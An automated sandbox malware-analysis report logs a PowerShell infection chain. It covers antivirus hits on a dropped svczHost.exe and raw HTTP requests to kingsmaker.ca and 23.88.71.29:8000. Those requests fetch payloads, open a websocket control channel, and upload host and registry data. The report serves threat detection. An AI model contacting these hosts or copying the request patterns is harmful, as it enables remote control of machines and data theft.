2024-11-29T09:09:03.420947+0100	2803274	2	Potentially Bad Traffic	192.168.11.30	49739	172.67.179.67	443	TCP
2024-11-29T09:09:26.789807+0100	2803274	2	Potentially Bad Traffic	192.168.11.30	49755	172.67.179.67	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Windows\Temp\svczHost.exe

Avira: detection malicious, Label: TR/AVI.Agent.izors

Multi AV Scanner detection for dropped file

Source: C:\Windows\Temp\svczHost.exe

ReversingLabs: Detection: 66%

Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49761 version: TLS 1.2

Source:	Binary string: .pdbpdbtem.pdbD source: powershell.exe, 00000009.00000002.4154450229.000001BD75AF7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ?\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.3074920696.0000015B6D4E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: b.pdb- source: powershell.exe, 00000009.00000002.4154450229.000001BD75AF7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior

Networking

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp

String found in memory: <   "><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 8000
Source: unknown	Network traffic detected: HTTP traffic on port 8000 -> 49765

Source: global traffic

TCP traffic: 192.168.11.30:49763 -> 23.88.71.29:8000

Source: global traffic	HTTP traffic detected: GET /StaticFile/RdpService/79 HTTP/1.1Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /StaticFile/TermServiceTryRun/72 HTTP/1.1Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /api/check HTTP/1.1Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: HypkmC7LuEqn6kjELov16g==Sec-WebSocket-Version: 13
Source: global traffic	HTTP traffic detected: POST /api/registry HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: application/jsonContent-Length: 102Data Raw: 22 45 43 41 34 45 37 46 36 34 35 43 45 41 42 43 46 31 34 31 44 36 30 32 43 43 33 30 38 39 36 37 32 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "ECA4E7F645CEABCF141D602CC3089672\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Source: global traffic	HTTP traffic detected: POST /api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2 HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: multipart/form-data; boundary=---------------------8dd10236a5b037dContent-Length: 5689Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 32 33 36 61 35 62 30 33 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 54 00 65 00 72 00 6d 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 5d 00 0d 00 0a 00 22 00 44 00 65 00 70 00 65 00 6e 00 64 00 4f 00 6e 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 22 00 3d 00 68 00 65 00 78 00 28 00 37 00 29 00 3a 00 35 00 32 00 2c 00 30 00 30 00 2c 00 35 00 30 00 2c 00 30 00 30 00 2c 00 34 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 0d 00 0a 00 22 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 37 00 22 00 0d 00 0a 00 22 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 38 00 22 00 0d 00 0a 00 22 00 45 00 72 00 72 00 6f 00 72 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 22 00 3d 00 64 00 77 00 6f 00 72 00 64 00 3a 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 31 00 0d 00 0a 00 22 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 41 00 63 00 74 00 69 00 6f 00 6e 00 73 00 22 00 3d 00 68 00 65 00 78 00 3a 00 38 00 30 00 2c 00 35 00 31 00 2c 00 30 00 31 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 33 00

Source: Joe Sandbox View	IP Address: 172.64.41.3 172.64.41.3
Source: Joe Sandbox View	IP Address: 23.88.71.29 23.88.71.29

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49739 -> 172.67.179.67:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49737 -> 172.67.179.67:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49755 -> 172.67.179.67:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49761 -> 172.67.179.67:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49766 -> 172.67.179.67:443

Source: global traffic	HTTP traffic detected: GET /file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302
Source: global traffic	HTTP traffic detected: GET /file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7adc6c2dde79a5e11323d HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302
Source: global traffic	HTTP traffic detected: GET /file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 85
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 86
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 62
Source: global traffic	HTTP traffic detected: GET /file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 140
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 69
Source: global traffic	HTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 200
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 97
Source: global traffic	HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 64

Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.204.249.81
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.71.29
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: global traffic	HTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /StaticFile/RdpService/79 HTTP/1.1Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /StaticFile/TermServiceTryRun/72 HTTP/1.1Host: kingsmaker.ca
Source: global traffic	HTTP traffic detected: GET /api/check HTTP/1.1Host: kingsmaker.caConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: HypkmC7LuEqn6kjELov16g==Sec-WebSocket-Version: 13

Source: global traffic	DNS traffic detected: DNS query: kingsmaker.ca
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302

Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://.css
Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://.jpg
Source: powershell.exe, 00000001.00000002.3166238726.000001C838C98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3074920696.0000015B6D466000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4121286821.000001BD75897000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4406842789.000002934A650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D359F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000001.00000002.3166238726.000001C838C98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3074920696.0000015B6D466000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4121286821.000001BD75897000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4406842789.000002934A650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D359F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000005.00000002.3077551508.0000015B6D871000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.co
Source: powershell.exe, 00000014.00000002.3349142454.00000186B9B6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000009.00000002.3329091603.000001BD019FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://kingsmaker.ca
Source: svczHost.exe, 00000010.00000002.4401647954.00000252B68A9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://kingsmaker.ca:443/x
Source: powershell.exe, 00000001.00000002.3157492838.000001C830D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3157492838.000001C830BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3071558533.0000015B653A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
